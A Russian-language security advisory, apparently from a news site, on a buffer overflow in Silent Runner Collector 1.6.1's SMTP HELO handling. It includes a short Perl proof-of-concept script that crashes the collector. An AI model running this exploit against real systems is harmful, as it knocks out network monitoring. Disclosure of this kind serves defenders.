SilentRunner -
пассивный
многофункциональный инструмент для мониторинга сетевой активности в
реальном времени, делает виртуальные снимки использования сети и
уязвимостей. Уязвимость в программе (баг в сниффере) приводит к тому,
что неправильно обрабатываются SMTP запросы, позволяя вызвать
прекращение работы программы.

Системы уязвимы:
Silent Runner Collector version 1.6.1

Silent Runner Collector (SRC) содержит переполнение буфера,
связанное с
обработкой SMTP трафика. Буфер содержит SMTP HELO линию. Баг
происходит в том случае, если команда HELO превышает 4096 байтовый
сегмент сет, контролируемый программой. Эта уязвимость может быть
использована для отключения коллектора программы и остановки
мониторинга сетевого трафика.

Эксплоит:

#!/usr/bin/perl
# This is a simple script that demonstrates the
# SRC HELO overflow vulnerability. It will result
# in a crashed silent runner collector so please do
# not use it on production networks. It is intended
# for demonstration purposes only.
use IO::Socket;
$remote_host = '192.168.111.3';
$remote_port = 25;
$buf = 'A' x 4092;
$socket = IO::Socket::INET->new(PeerAddr => $remote_host,
PeerPort => $remote_port,
Proto => "tcp",
Type => SOCK_STREAM)
or die "Can't connect to $remote_host:$remote_port : $@\n";
# 'HELO ' + $buf = 4097 bytes ( 1 byte too much)
print $socket "HELO $buf";

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии